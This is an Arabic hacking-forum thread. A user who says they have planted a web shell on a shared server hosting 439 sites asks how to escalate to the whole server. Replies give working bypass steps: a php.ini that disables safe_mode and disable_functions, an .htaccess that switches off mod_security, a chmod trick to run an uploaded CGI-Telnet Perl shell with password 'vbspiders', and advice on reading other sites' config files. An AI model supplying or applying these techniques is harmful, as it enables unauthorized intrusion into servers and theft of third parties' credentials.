محترفين السيرفر فقط ؟

بسم الله الرحمن الرحيم
السلام عليكم ورحمه الله وبركاته
كيف حالكم ياشباب
فضلا وليس امرا في سيرفر اخترقته ولم رجعت لي السيرفر اختراق موقع مرة ثانية رفعت الشل عليه ابي اختراق السيرفر كامل استعرض الملفات الكوفينق بعد عمل الاختصار txt تطلع المواقع لم افتح تطلع الصفحة الرئسية علما باني جربت كل الطرق عليه مانفع . ابي طريقة احترافية جدا اذكان ممكن
لكم بعض المعلومات
There are : [ 439 ] Domain موقع
PHP النسخة 5.2.17
السرفيرSoftware: Apache/2.2.22 (Unix)
السيف مودSafe-mode: OFF (no secure)
الدوال المعطله
disable_functions = "system,dlopen,popen,passthru,proc_open,proc_close ,dl,escapeshellcmd,proc_nice,system_exec,shell_exe c,exec,fpassthru,crack_check,crack_closedict,crack _getlastmessage,crack_opendict,psockopen,php_ini_s canned_files,hell-exec,system,dl,ctrl_dir,phpini,tmp,safe_mode,syste mroot,server_software,get_current_user,HTTP_HOST,i ni_restore,popen,pclose,exec,shell_exec,suExec,pas sthru,proc_open,proc_nice,proc_terminate,proc_get_ status,proc_close,leak,apache_child_terminate,posi x_kill,posix_mkfifo,posix_setpgid,posix_setsid,pos ix_setuid,escapeshellcmd,escapeshellarg,posix_cter mid,posix_getcwd,posix_getegid,posix_geteuid,posix _getgid,posix_getgrgid,posix_getgrnam,posix_getgro ups,posix_getlogin,posix_getpgid,posix_getpgrp,pos ix_getpid,posix_getppid,posix_getpwnam,posix_getpw uid,posix_getrlimit,posix_getsid,posix_getuid,posi x_isatty,posix_setegid,posix_seteuid,posix_setgid, posix_times,posix_ttyname,posix_uname,posix_access ,posix_get_last_error,posix_mknod,posix_strerror,p osix_initgroups,posix_setsidposix_setuid,symlink"
;disable_functions = "system,dlopen,popen,passthru,proc_open,proc_close ,dl,escapeshellcmd,proc_nice,system_exec,shell_exe c,exec,fpassthru,crack_check,crack_closedict,crack _getlastmessage,crack_opendict,psockopen,php_ini_s canned_files,hell-exec,system,dl,ctrl_dir,phpini,tmp,safe_mode,syste mroot,server_software,get_current_user,HTTP_HOST,i ni_restore,popen,pclose,exec,shell_exec,suExec,pas sthru,proc_open,proc_nice,proc_terminate,proc_get_ status,proc_close,leak,apache_child_terminate,posi x_kill,posix_mkfifo,posix_setpgid,posix_setsid,pos ix_setuid,escapeshellcmd,escapeshellarg,posix_cter mid,posix_getcwd,posix_getegid,posix_geteuid,posix _getgid,posix_getgrgid,posix_getgrnam,posix_getgro ups,posix_getlogin,posix_getpgid,posix_getpgrp,pos ix_getpid,posix_getppid,posix_getpwnam,posix_getpw uid,posix_getrlimit,posix_getsid,posix_getuid,posi x_isatty,posix_setegid,posix_seteuid,posix_setgid, posix_times,posix_ttyname,posix_uname,posix_access ,posix_get_last_error,posix_mknod,posix_strerror,p osix_initgroups,posix_setsidposix_setuid"
;disable_functions = "system,dlopen,popen,passthru,proc_open,proc_close ,dl,escapeshellcmd,proc_nice,system_exec,shell_exe c,exec,fpassthru,crack_check,crack_closedict,crack _getlastmessage,crack_opendict,psockopen,php_ini_s canned_files,hell-exec,system,dl,ctrl_dir,phpini,tmp,safe_mode,syste mroot,server_software,get_current_user,HTTP_HOST,i ni_restore,popen,pclose,exec,shell_exec,suExec,pas sthru,proc_open,proc_nice,proc_terminate,proc_get_ status,proc_close,leak,apache_child_terminate,posi x_kill,posix_mkfifo,posix_setpgid,posix_setsid,pos ix_setuid,escapeshellcmd,escapeshellarg,posix_cter mid,posix_getcwd,posix_getegid,posix_geteuid,posix _getgid,posix_getgrgid,posix_getgrnam,posix_getgro ups,posix_getlogin,posix_getpgid,posix_getpgrp,pos ix_getpid,posix_getppid,posix_getpwnam,posix_getpw uid,posix_getrlimit,posix_getsid,posix_getuid,posi x_isatty,posix_setegid,posix_seteuid,posix_setgid, posix_times,posix_ttyname,posix_uname,posix_access ,posix_get_last_error,posix_mknod,posix_strerror,p osix_initgroups,posix_setsidposix_setuid,symlink"

شباب لو معليكم امر ابي طريقة اخترافية جدا تكون مرتبة
انا في انتظاركم يامحترفين
فمان الرحمن

ارفع ملف php.ini

يكون محتواه

safe_mode = OFF

disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF

شكرا لك ياغالي ولكن وين الرفعه على مسار الشل او في مجلد الاختصار
انا رفعت على مسار الشل ابي ستغرضها ما يفتح معي ؟

هههه موفق باذن الله في اختراق رزمة من المواقع و لا تنساني بالاندكس

بسم الله ما شاء الله
الدوال الممنوعه :D \

ارفع الشل المرفق
هو وملف
.htaccess

فى مجلد لوحدهم
وبعدها اعمل ملف جديد بأسم
vbspiders.php
وحط جواه الكود
<? chmod("vbspiders.nEx",0755) ?>

وارفعه داخل مجلد الشل المرفق +
استعرض ملف البي اتش بي من المتصفح
localhost/vbspiders.php
هتلاقي صفحه بيضه

بعدها استعرض الشل المرفق
localhost/vbspiders.nEx

وادخل فى خانة الباسورد
vbspiders
وطبق اوامر بدون اي مشاكل

لو بدك تعمل اختصار للسيرفر

mkdir test
cd test
ارفع .htaccess

اقتباس <Files *.php> ForceType application/x-httpd-php4 </files> <IfModule mod_security.c> SecFilterEngine off SecFilterScanPOST off </IfModule>

هلا بك ياغالي عندما حملة الملف لي في المرفقات حصلت vb.php. vbspiders.nEx الهتكس غير موجود
عموما رفعت htaccess عندي في مجلد وبعدين رفعت vb.php من الشل لموقع فتحها حصل موجود الكود برفع الملف في مجلد الشل vbspiders.nEx مايرفع معي رحت رفعته من من الشل . استعرضت vb.php تطلع صفحة بيضاء ومن ثم استعرضت vbspiders.nEx تطلع اول الصفحة #!/usr/bin/perl
#------------------------------------------------------------------------------
# Copyright and Licence
#------------------------------------------------------------------------------
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
ملاحظة تري هذا ماني فاهمه
وادخل فى خانة الباسورد
vbspiders
وطبق اوامر بدون اي مشاكل
-------------------------
يعني نفيذ الامرcat /etc/xxxx.com
من احد الموقع احد الموقع في السيرفر ستبدالة في xxxx انا سويت كذا صح ام خطا نفذت الامر بس طلع مافي شي
على فكرة تري vbspiders.php وvbspiders.nEx
على نفس مسار الشل لي رفع عليه الموقع
انا في انتظارك

nor15din
ماكو فائدة

اخي الكريم بعرف اوامر الينكس لان جهازي الينكس ولكن ممكن هنا خطا ليت تضيفني عندك برسلك ايميلي

اللهم يزيدك يا غالي

انا شرحت لك طريقة استغلال الدوال الغير ممنوعه .. ممكن تفيدك او تفيد غيرك
ولو تطرح الخطا اللي ظهر معك مافي مشاكل لكي الجميع يستفاد ..

طيب انا عطيتك الموقع طبق عليه صار معاك

شكرا على جهودك ياغالي

بالتوفيق ان شاء الله وللافادة استعمل السكربت
اللي هنا
سكربت سحب كونفيجات السيرفر